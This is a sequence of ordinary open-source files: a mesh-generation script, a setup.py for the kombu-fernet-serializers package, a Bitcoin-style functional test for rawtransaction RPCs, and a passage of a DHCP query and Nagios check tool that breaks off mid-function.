Y = Y * scale[1]/4.0
# Visualization
fig = plt.figure()
ax = fig.gca(projection="3d")
surf = ax.plot_surface(X, Y, Z2, rstride=1, cstride=1, cmap=cm.winter,
linewidth=0, antialiased=False)
plt.show()
return X, Y, Z1, Z2
def interpolate_surf(points, values, ipoints, method = "nearest"):
from scipy.interpolate import griddata
'''
Used to interpolate a sample surface to a surface in a mesh.
'''
return griddata(points, values, ipoints, method= method)
def surfgen_shared_boundary(bbox=[-10,-10,-10, 10,10,10], l=3):
'''
Generates two surfaces in 3D with shared boundary for an experiment.
Writes the two surface as .poly file for tetgen.
'''
# Generating point grids for two surfaces
xmin = bbox[0]
xmax = bbox[3]
ymin = bbox[1]
ymax = bbox[4]
zmin = bbox[2]
zmax = bbox[5]
Xmin, Ymin, Zmin, Xmax, Ymax, Zmax = np.array(bbox)*0.8
X, Y, Z1, Z2 = sample_surf([Xmax, Ymax, zmax*0.3], step=0.8)
Z1 = Z1 + zmax*0.4
Z2 = Z2 - zmax*0.4
#Symmertic surfs
#Z2 = -Z1 - zmax*0.4
'''
# Plotting the two surfaces
fig = plt.figure()
ax = fig.gca(projection="3d")
surf = ax.scatter(X, Y, Z1.reshape(-1,1), color='b')
surf = ax.scatter(X, Y, Z2.reshape(-1,1), color='r')
plt.show()
'''
mesh = meshgen2d([Xmin, Ymin, Xmax, Ymax], l, include_corners=True)
sample_points = np.hstack((X.reshape(-1,1), Y.reshape(-1,1)))
# Interpolating the surface mesh into two different surfaces
# similar to the the sample surfaces generated before
Z1 = interpolate_surf(sample_points, Z1.reshape(-1,1), mesh.points)
Z2 = interpolate_surf(sample_points, Z2.reshape(-1,1), mesh.points)
# Integrating two surfaces
points1 = np.hstack((mesh.points, Z1))
print points1.shape
points2 = np.hstack((mesh.points, Z2))
print points2.shape
corners = utils.boundary_points(bbox)
midcorners = utils.mid_corners(bbox)
offset1 = len(corners) +len(midcorners) + 1
offset2 = len(corners) + len(midcorners) + len(points1) + 1
points = np.concatenate((corners, midcorners, points1, points2), axis=0)
print points.shape
triangles1 = mesh.simplices + offset1
triangles2 = mesh.simplices + offset2
# Adding the indices of the points as the last column of the coordainate list
Xmin_s1 = np.argwhere(points1[:,0]==Xmin)
Xmin_s1_points = np.hstack((points1[Xmin_s1.reshape(-1,)], Xmin_s1))
# Sorting the indices such that the points are in increasing order of its y-component
Xmin_s1 = (Xmin_s1_points[:,3][np.argsort(Xmin_s1_points[:,1])] + offset1).astype(int)
Xmin_s2 = np.argwhere(points2[:,0]==Xmin)
Xmin_s2_points = np.hstack((points2[Xmin_s2.reshape(-1,)], Xmin_s2))
Xmin_s2 = (Xmin_s2_points[:,3][np.argsort(Xmin_s2_points[:,1])] + offset2).astype(int)
Xmax_s1 = np.argwhere(points1[:,0]==Xmax)
Xmax_s1_points = np.hstack((points1[Xmax_s1.reshape(-1,)], Xmax_s1))
Xmax_s1 = (Xmax_s1_points[:,3][np.argsort(Xmax_s1_points[:,1])] + offset1).astype(int)
Xmax_s2 = np.argwhere(points2[:,0]==Xmax)
Xmax_s2_points = np.hstack((points2[Xmax_s2.reshape(-1,)], Xmax_s2))
Xmax_s2 = (Xmax_s2_points[:,3][np.argsort(Xmax_s2_points[:,1])] + offset2).astype(int)
Ymin_s1 = np.argwhere(points1[:,1]==Ymin)
Ymin_s1_points = np.hstack((points1[Ymin_s1.reshape(-1,)], Ymin_s1))
Ymin_s1 = (Ymin_s1_points[:,3][np.argsort(Ymin_s1_points[:,0])] + offset1).astype(int)
Ymin_s2 = np.argwhere(points2[:,1]==Ymin)
Ymin_s2_points = np.hstack((points2[Ymin_s2.reshape(-1,)], Ymin_s2))
Ymin_s2 = (Ymin_s2_points[:,3][np.argsort(Ymin_s2_points[:,0])] + offset2).astype(int)
Ymax_s1 = np.argwhere(points1[:,1]==Ymax)
Ymax_s1_points = np.hstack((points1[Ymax_s1.reshape(-1,)], Ymax_s1))
Ymax_s1 = (Ymax_s1_points[:,3][np.argsort(Ymax_s1_points[:,0])] + offset1).astype(int)
Ymax_s2 = np.argwhere(points2[:,1]==Ymax)
Ymax_s2_points = np.hstack((points2[Ymax_s2.reshape(-1,)], Ymax_s2))
Ymax_s2 = (Ymax_s2_points[:,3][np.argsort(Ymax_s2_points[:,0])] + offset2).astype(int)
for i in range(len(Xmin_s1)-1):
triangles1 = np.vstack((triangles1, [9, Xmin_s1[i], Xmin_s1[i+1]]))
triangles1 = np.vstack((triangles1, [9, Xmin_s1[-1], 12]))
for i in range(len(Xmin_s2)-1):
triangles2 = np.vstack((triangles2, [9, Xmin_s2[i], Xmin_s2[i+1]]))
triangles2 = np.vstack((triangles2, [9, Xmin_s2[-1], 12]))
for i in range(len(Xmax_s1)-1):
triangles1 = np.vstack((triangles1, [10, Xmax_s1[i], Xmax_s1[i+1]]))
triangles1 = np.vstack((triangles1, [10, Xmax_s1[-1], 11]))
for i in range(len(Xmax_s2)-1):
triangles2 = np.vstack((triangles2, [10, Xmax_s2[i], Xmax_s2[i+1]]))
triangles2 = np.vstack((triangles2, [10, Xmax_s2[-1], 11]))
for i in range(len(Ymin_s1)-1):
triangles1 = np.vstack((triangles1, [9, Ymin_s1[i], Ymin_s1[i+1]]))
triangles1 = np.vstack((triangles1, [9, Ymin_s1[-1], 10]))
for i in range(len(Ymin_s2)-1):
triangles2 = np.vstack((triangles2, [9, Ymin_s2[i], Ymin_s2[i+1]]))
triangles2 = np.vstack((triangles2, [9, Ymin_s2[-1], 10]))
for i in range(len(Ymax_s1)-1):
triangles1 = np.vstack((triangles1, [12, Ymax_s1[i], Ymax_s1[i+1]]))
triangles1 = np.vstack((triangles1, [12, Ymax_s1[-1], 11]))
for i in range(len(Ymax_s2)-1):
triangles2 = np.vstack((triangles2, [12, Ymax_s2[i], Ymax_s2[i+1]]))
triangles2 = np.vstack((triangles2, [12, Ymax_s2[-1], 11]))
triangles = np.vstack((triangles1, triangles2))
# Preparing PLC and save it to .poly file for tetgen
with open( os.environ['HOME'] +'/mediansurf.poly', 'w') as f:
f.write("#Part 1 - the node list\n")
f.write("#%d nodes in 3d, no attributes, no boundary marker\n"%points.shape[0])
f.write('%d %d %d %d\n'%(points.shape[0], 3, 0,0))
for i, p in enumerate(points):
f.write("%d %f %f %f\n"%(i+1, p[0], p[1], p[2]))
# Each 4 sides has 3 polygons
# Top and bottom
# Each triangle of the two surfaces are facets
fn = 6 + len(triangles)
f.write("#Part 2 - the facet list.\n")
f.write("#%d facets with boundary markers\n"%fn)
f.write('%d %d\n'%(fn, 1))
f.write("#Boundary facet list.\n")
f.write("%d %d %d\n"%(1, 0, 1))
f.write("4 1 2 3 4\n")
f.write("%d %d %d\n"%(1, 0, 1))
f.write("4 5 6 7 8\n")
#xmin side
f.write("2 0 1\n")
f.write("4 1 4 8 5\n")
f.write("2 9 12\n")
#ymin side
f.write("2 0 1\n")
f.write("4 1 2 6 5\n")
f.write("2 9 10\n")
#xmax side
f.write("2 0 1\n")
f.write("4 2 3 7 6\n")
f.write("2 10 11\n")
#ymax side
f.write("2 0 1\n")
f.write("4 3 4 8 7\n")
f.write("2 11 12\n")
f.write("#Facet list of surface1.\n")
for t in triangles1:
f.write("%d %d %d\n"%(1, 0, -1))
f.write("%d %d %d %d\n"%(3, t[0], t[1], t[2]))
f.write("#Facet list of surface2.\n")
for t in triangles2:
f.write("%d %d %d\n"%(1, 0, -2))
f.write("%d %d %d %d\n"%(3, t[0], t[1], t[2]))
f.write("#Part 3 - the hole list.\n")
f.write('%d\n'%0)
f.write("#Part 4 - the region list.\n")
f.write('%d\n'%0)
if __name__ == "__main__":
surfgen_shared_boundary()
| gpl-3.0 | -5,031,703,206,285,976,000 | 37.1673 | 90 | 0.5789 | false | 2.551601 | false | false | false |
alex/kombu-fernet-serializers | setup.py | 1 | 1648 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import kombu_fernet
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
packages = [
'kombu_fernet',
'kombu_fernet.serializers',
]
requires = [
'anyjson>=0.3.3',
'kombu>=3.0.16',
]
with open('README.rst') as f:
readme = f.read()
with open('LICENSE') as f:
license = f.read()
setup(
name='kombu-fernet-serializers',
version=kombu_fernet.__version__,
description='Symmetrically encrypted serializers for Kombu',
long_description=readme,
author='David Gouldin',
author_email='[email protected]',
url='https://github.com/heroku/kombu-fernet-serializers',
packages=packages,
package_data={'': ['LICENSE']},
include_package_data=True,
install_requires=requires,
license=license,
zip_safe=False,
classifiers=(
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
),
entry_points={
'kombu.serializers': [
'fernet_json = kombu_fernet.serializers.json:register_args',
'fernet_yaml = kombu_fernet.serializers.yaml:register_args',
'fernet_pickle = kombu_fernet.serializers.pickle:register_args',
'fernet_msgpack = kombu_fernet.serializers.msgpack:register_args',
]
}
)
| mit | 423,783,469,457,479,940 | 25.580645 | 78 | 0.633495 | false | 3.419087 | false | false | false |
globaltoken/globaltoken | test/functional/rpc_rawtransaction.py | 1 | 18199 | #!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the rawtransaction RPCs.
Test the following RPCs:
- createrawtransaction
- signrawtransactionwithwallet
- sendrawtransaction
- decoderawtransaction
- getrawtransaction
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
class multidict(dict):
"""Dictionary that allows duplicate keys.
Constructed with a list of (key, value) tuples. When dumped by the json module,
will output invalid json with repeated keys, eg:
>>> json.dumps(multidict([(1,2),(1,2)])
'{"1": 2, "1": 2}'
Used to test calls to rpc methods with repeated keys in the json object."""
def __init__(self, x):
dict.__init__(self, x)
self.x = x
def items(self):
return self.x
# Create one-input, one-output, no-fee transaction:
class RawTransactionsTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [["-addresstype=legacy"], ["-addresstype=legacy"], ["-addresstype=legacy"]]
def setup_network(self, split=False):
super().setup_network()
connect_nodes_bi(self.nodes,0,2)
def run_test(self):
#prepare some coins for multiple *rawtransaction commands
self.nodes[2].generate(1)
self.sync_all()
self.nodes[0].generate(101)
self.sync_all()
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.5)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.0)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),5.0)
self.sync_all()
self.nodes[0].generate(5)
self.sync_all()
# Test getrawtransaction on genesis block coinbase returns an error
block = self.nodes[0].getblock(self.nodes[0].getblockhash(0))
assert_raises_rpc_error(-5, "The genesis block coinbase is not considered an ordinary transaction", self.nodes[0].getrawtransaction, block['merkleroot'])
# Test `createrawtransaction` required parameters
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction)
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [])
# Test `createrawtransaction` invalid extra parameters
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [], {}, 0, False, 'foo')
# Test `createrawtransaction` invalid `inputs`
txid = '1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000'
assert_raises_rpc_error(-3, "Expected type array", self.nodes[0].createrawtransaction, 'foo', {})
assert_raises_rpc_error(-1, "JSON value is not an object as expected", self.nodes[0].createrawtransaction, ['foo'], {})
assert_raises_rpc_error(-8, "txid must be hexadecimal string", self.nodes[0].createrawtransaction, [{}], {})
assert_raises_rpc_error(-8, "txid must be hexadecimal string", self.nodes[0].createrawtransaction, [{'txid': 'foo'}], {})
assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': txid}], {})
assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 'foo'}], {})
assert_raises_rpc_error(-8, "Invalid parameter, vout must be positive", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': -1}], {})
assert_raises_rpc_error(-8, "Invalid parameter, sequence number is out of range", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 0, 'sequence': -1}], {})
# Test `createrawtransaction` invalid `outputs`
address = self.nodes[0].getnewaddress()
assert_raises_rpc_error(-3, "Expected type object", self.nodes[0].createrawtransaction, [], 'foo')
assert_raises_rpc_error(-8, "Data must be hexadecimal string", self.nodes[0].createrawtransaction, [], {'data': 'foo'})
assert_raises_rpc_error(-5, "Invalid Bitcoin address", self.nodes[0].createrawtransaction, [], {'foo': 0})
assert_raises_rpc_error(-3, "Invalid amount", self.nodes[0].createrawtransaction, [], {address: 'foo'})
assert_raises_rpc_error(-3, "Amount out of range", self.nodes[0].createrawtransaction, [], {address: -1})
assert_raises_rpc_error(-8, "Invalid parameter, duplicated address: %s" % address, self.nodes[0].createrawtransaction, [], multidict([(address, 1), (address, 1)]))
# Test `createrawtransaction` invalid `locktime`
assert_raises_rpc_error(-3, "Expected type number", self.nodes[0].createrawtransaction, [], {}, 'foo')
assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, -1)
assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, 4294967296)
# Test `createrawtransaction` invalid `replaceable`
assert_raises_rpc_error(-3, "Expected type bool", self.nodes[0].createrawtransaction, [], {}, 0, 'foo')
#########################################
# sendrawtransaction with missing input #
#########################################
inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1}] #won't exists
outputs = { self.nodes[0].getnewaddress() : 4.998 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
rawtx = self.nodes[2].signrawtransactionwithwallet(rawtx)
# This will raise an exception since there are missing inputs
assert_raises_rpc_error(-25, "Missing inputs", self.nodes[2].sendrawtransaction, rawtx['hex'])
#####################################
# getrawtransaction with block hash #
#####################################
# make a tx by sending then generate 2 blocks; block1 has the tx in it
tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress(), 1)
block1, block2 = self.nodes[2].generate(2)
self.sync_all()
# We should be able to get the raw transaction by providing the correct block
gottx = self.nodes[0].getrawtransaction(tx, True, block1)
assert_equal(gottx['txid'], tx)
assert_equal(gottx['in_active_chain'], True)
# We should not have the 'in_active_chain' flag when we don't provide a block
gottx = self.nodes[0].getrawtransaction(tx, True)
assert_equal(gottx['txid'], tx)
assert 'in_active_chain' not in gottx
# We should not get the tx if we provide an unrelated block
assert_raises_rpc_error(-5, "No such transaction found", self.nodes[0].getrawtransaction, tx, True, block2)
# An invalid block hash should raise the correct errors
assert_raises_rpc_error(-8, "parameter 3 must be hexadecimal", self.nodes[0].getrawtransaction, tx, True, True)
assert_raises_rpc_error(-8, "parameter 3 must be hexadecimal", self.nodes[0].getrawtransaction, tx, True, "foobar")
assert_raises_rpc_error(-8, "parameter 3 must be of length 64", self.nodes[0].getrawtransaction, tx, True, "abcd1234")
assert_raises_rpc_error(-5, "Block hash not found", self.nodes[0].getrawtransaction, tx, True, "0000000000000000000000000000000000000000000000000000000000000000")
# Undo the blocks and check in_active_chain
self.nodes[0].invalidateblock(block1)
gottx = self.nodes[0].getrawtransaction(txid=tx, verbose=True, blockhash=block1)
assert_equal(gottx['in_active_chain'], False)
self.nodes[0].reconsiderblock(block1)
assert_equal(self.nodes[0].getbestblockhash(), block2)
#########################
# RAW TX MULTISIG TESTS #
#########################
# 2of2 test
addr1 = self.nodes[2].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[2].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
# Tests for createmultisig and addmultisigaddress
assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 1, ["01020304"])
self.nodes[0].createmultisig(2, [addr1Obj['pubkey'], addr2Obj['pubkey']]) # createmultisig can only take public keys
assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 2, [addr1Obj['pubkey'], addr1]) # addmultisigaddress can take both pubkeys and addresses so long as they are in the wallet, which is tested here.
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr1])['address']
#use balance deltas instead of absolute values
bal = self.nodes[2].getbalance()
# send 1.2 BTC to msig adr
txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[2].getbalance(), bal+Decimal('1.20000000')) #node2 has both keys of the 2of2 ms addr., tx should affect the balance
# 2of3 test from different nodes
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr3 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
addr3Obj = self.nodes[2].getaddressinfo(addr3)
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey']])['address']
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
#THIS IS AN INCOMPLETE FEATURE
#NODE2 HAS TWO OF THREE KEY AND THE FUNDS SHOULD BE SPENDABLE AND COUNT AT BALANCE CALCULATION
assert_equal(self.nodes[2].getbalance(), bal) #for now, assume the funds of a 2of3 multisig tx are not marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = False
for outpoint in rawTx['vout']:
if outpoint['value'] == Decimal('2.20000000'):
vout = outpoint
break
bal = self.nodes[0].getbalance()
inputs = [{ "txid" : txId, "vout" : vout['n'], "scriptPubKey" : vout['scriptPubKey']['hex'], "amount" : vout['value']}]
outputs = { self.nodes[0].getnewaddress() : 2.19 }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned = self.nodes[1].signrawtransactionwithwallet(rawTx, inputs)
assert_equal(rawTxPartialSigned['complete'], False) #node1 only has one key, can't comp. sign the tx
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx, inputs)
assert_equal(rawTxSigned['complete'], True) #node2 can sign the tx compl., own two of three keys
self.nodes[2].sendrawtransaction(rawTxSigned['hex'])
rawTx = self.nodes[0].decoderawtransaction(rawTxSigned['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx
# 2of2 test for combining transactions
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
mSigObjValid = self.nodes[2].getaddressinfo(mSigObj)
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx2 = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[2].getbalance(), bal) # the funds of a 2of2 multisig tx should not be marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx2 = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = False
for outpoint in rawTx2['vout']:
if outpoint['value'] == Decimal('2.20000000'):
vout = outpoint
break
bal = self.nodes[0].getbalance()
inputs = [{ "txid" : txId, "vout" : vout['n'], "scriptPubKey" : vout['scriptPubKey']['hex'], "redeemScript" : mSigObjValid['hex'], "amount" : vout['value']}]
outputs = { self.nodes[0].getnewaddress() : 2.19 }
rawTx2 = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned1 = self.nodes[1].signrawtransactionwithwallet(rawTx2, inputs)
self.log.info(rawTxPartialSigned1)
assert_equal(rawTxPartialSigned['complete'], False) #node1 only has one key, can't comp. sign the tx
rawTxPartialSigned2 = self.nodes[2].signrawtransactionwithwallet(rawTx2, inputs)
self.log.info(rawTxPartialSigned2)
assert_equal(rawTxPartialSigned2['complete'], False) #node2 only has one key, can't comp. sign the tx
rawTxComb = self.nodes[2].combinerawtransaction([rawTxPartialSigned1['hex'], rawTxPartialSigned2['hex']])
self.log.info(rawTxComb)
self.nodes[2].sendrawtransaction(rawTxComb)
rawTx2 = self.nodes[0].decoderawtransaction(rawTxComb)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx
# decoderawtransaction tests
# witness transaction
encrawtx = "010000000001010000000000000072c1a6a246ae63f74f931e8365e15a089c68d61900000000000000000000ffffffff0100e1f50500000000000000000000"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx, True) # decode as witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # force decode as non-witness transaction
# non-witness transaction
encrawtx = "01000000010000000000000072c1a6a246ae63f74f931e8365e15a089c68d61900000000000000000000ffffffff0100e1f505000000000000000000"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx, False) # decode as non-witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
# getrawtransaction tests
# 1. valid parameters - only supply txid
txHash = rawTx["hash"]
assert_equal(self.nodes[0].getrawtransaction(txHash), rawTxSigned['hex'])
# 2. valid parameters - supply txid and 0 for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txHash, 0), rawTxSigned['hex'])
# 3. valid parameters - supply txid and False for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txHash, False), rawTxSigned['hex'])
# 4. valid parameters - supply txid and 1 for verbose.
# We only check the "hex" field of the output so we don't need to update this test every time the output format changes.
assert_equal(self.nodes[0].getrawtransaction(txHash, 1)["hex"], rawTxSigned['hex'])
# 5. valid parameters - supply txid and True for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txHash, True)["hex"], rawTxSigned['hex'])
# 6. invalid parameters - supply txid and string "Flase"
assert_raises_rpc_error(-1, "not a boolean", self.nodes[0].getrawtransaction, txHash, "Flase")
# 7. invalid parameters - supply txid and empty array
assert_raises_rpc_error(-1, "not a boolean", self.nodes[0].getrawtransaction, txHash, [])
# 8. invalid parameters - supply txid and empty dict
assert_raises_rpc_error(-1, "not a boolean", self.nodes[0].getrawtransaction, txHash, {})
inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1, 'sequence' : 1000}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
decrawtx= self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['vin'][0]['sequence'], 1000)
# 9. invalid parameters - sequence number out of range
inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1, 'sequence' : -1}]
outputs = { self.nodes[0].getnewaddress() : 1 }
assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs)
# 10. invalid parameters - sequence number out of range
inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1, 'sequence' : 4294967296}]
outputs = { self.nodes[0].getnewaddress() : 1 }
assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs)
inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1, 'sequence' : 4294967294}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
decrawtx= self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['vin'][0]['sequence'], 4294967294)
if __name__ == '__main__':
RawTransactionsTest().main()
| mit | 7,541,542,807,572,354,000 | 54.654434 | 233 | 0.658882 | false | 3.66472 | true | false | false |
L337hium/dhquery | dhquery.py | 1 | 7156 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fileencoding=utf-8
# vim:tabstop=2
from random import Random
from optparse import OptionParser
from pydhcplib.dhcp_packet import DhcpPacket
from pydhcplib.dhcp_network import DhcpClient
from pydhcplib.type_hw_addr import hwmac
from pydhcplib.type_ipv4 import ipv4
import socket
import sys
r = Random()
r.seed()
dhcpTypes = {
1: 'DISCOVER',
2: 'OFFER',
3: 'REQUEST',
4: 'DECLINE',
5: 'ACK',
6: 'NACK',
7: 'RELEASE',
8: 'INFORM',
}
nagiosRC = {
0: 'OK',
1: 'Warning',
2: 'Critical',
3: 'Unknown',
}
def nagiosExit(rc,message):
print "%s: %s"%(nagiosRC.get(rc,'???'),message)
sys.exit(rc)
class SilentClient(DhcpClient):
def HandleDhcpAck(self,p):
return
def HandleDhcpNack(self,p):
return
def HandleDhcpOffer(self,p):
return
def HandleDhcpUnknown(self,p):
return
def HandleDhcpDiscover(self,p):
return
def genxid():
decxid = r.randint(0,0xffffffff)
xid = []
for i in xrange(4):
xid.insert(0, decxid & 0xff)
decxid = decxid >> 8
return xid
def genmac():
i = []
for z in xrange(6):
i.append(r.randint(0,255))
return ':'.join(map(lambda x: "%02x"%x,i))
def receivePacket(serverip, serverport, timeout, req):
"""Sends and receives packet from DHCP server"""
client = SilentClient(client_listen_port=67, server_listen_port=serverport)
client.dhcp_socket.settimeout(timeout)
if serverip == '0.0.0.0': req.SetOption('flags',[128, 0])
req_type = req.GetOption('dhcp_message_type')[0]
client.SendDhcpPacketTo(serverip,req)
# Don't wait answer for RELEASE message
if req_type == 7: return None
res = client.GetNextDhcpPacket()
# Try next packet if this packet is the same as packet we've sent.
if res.GetOption('dhcp_message_type')[0] == req_type: res = client.GetNextDhcpPacket()
return res
def preparePacket(xid=None,giaddr='0.0.0.0',chaddr='00:00:00:00:00:00',ciaddr='0.0.0.0',msgtype='discover',required_opts=[]):
req = DhcpPacket()
req.SetOption('op',[1])
req.SetOption('htype',[1])
req.SetOption('hlen',[6])
req.SetOption('hops',[0])
if not xid: xid = genxid()
req.SetOption('xid',xid)
req.SetOption('giaddr',ipv4(giaddr).list())
req.SetOption('chaddr',hwmac(chaddr).list() + [0] * 10)
req.SetOption('ciaddr',ipv4(ciaddr).list())
if msgtype == 'request':
mt = 3
elif msgtype == 'release':
mt = 7
else:
mt = 1
req.SetOption('dhcp_message_type',[mt])
# req.SetOption('parameter_request_list',1)
return req
def main():
parser = OptionParser()
parser.add_option("-s","--server", dest="server", default='0.0.0.0', help="DHCP server IP (default %default)")
parser.add_option("-p","--port", type="int", dest="port", default=67, help="DHCP server port (default (%default)")
parser.add_option("-m","--mac","--chaddr", dest="chaddr", help="chaddr: Client's MAC address, default random")
parser.add_option("-c","--ciaddr", dest="ciaddr", default='0.0.0.0', help="ciaddr: Client's desired IP address")
parser.add_option("-g","--giaddr", dest="giaddr", default='0.0.0.0', help="giaddr: Gateway IP address (if any)")
parser.add_option("-t","--type", dest="msgtype", type="choice", choices=["discover","request","release"],
default="discover", help="DHCP message type: discover, request, release (default %default)")
parser.add_option("-w","--timeout", dest="timeout", type="int", default=4, help="UDP timeout (default %default)")
parser.add_option("-r","--require", action="append", type="int", default=[1,3,6,51], dest="required_opts", help="Require options by its number")
parser.add_option("-y","--cycle", action="store_true", dest="docycle", help="Do full cycle: DISCOVERY, REQUEST, RELEASE")
parser.add_option("-n","--cycles", dest="cycles", type="int", default="1", help="Do number of cycles (default %default)")
parser.add_option("-v","--verbose", action="store_true", dest="verbose", help="Verbose operation")
parser.add_option("-q","--quiet", action="store_false", dest="verbose", help="Quiet operation")
parser.add_option("--nagios", action="store_true", dest="nagios", help="Nagios mode of operation")
(opts, args) = parser.parse_args()
if not opts.chaddr:
chaddr = genmac()
else:
chaddr = opts.chaddr
if opts.nagios: opts.verbose = False
verbose = opts.verbose
if opts.docycle:
request_dhcp_message_type = "discover"
else:
request_dhcp_message_type = opts.msgtype
request_ciaddr = opts.ciaddr
serverip = opts.server
cycleno = 1
xid = genxid()
while True:
if opts.cycles > 1 and opts.verbose is not False and (not opts.docycle or request_dhcp_message_type == "discover"):
print "="*100
print "| Cycle %s"%cycleno
print "="*100
req = preparePacket(xid=xid, giaddr=opts.giaddr, chaddr=chaddr, ciaddr=request_ciaddr, msgtype=request_dhcp_message_type, required_opts=opts.required_opts)
if verbose != False:
print "Sending %s [%s] packet to %s"%(request_dhcp_message_type.upper(),chaddr, opts.server)
if verbose == True:
print "-"*100
req.PrintHeaders()
req.PrintOptions()
print "="*100
print "\n"
try:
res = receivePacket(serverip=serverip, serverport=opts.port, timeout=opts.timeout, req=req)
except socket.timeout:
res = None
if opts.nagios: nagiosExit(2,"%s request has been timed out."%request_dhcp_message_type.upper())
if verbose != False: print "Timed out."
pass
if res:
dhcp_message_type = res.GetOption('dhcp_message_type')[0]
server_identifier = ipv4(res.GetOption('server_identifier'))
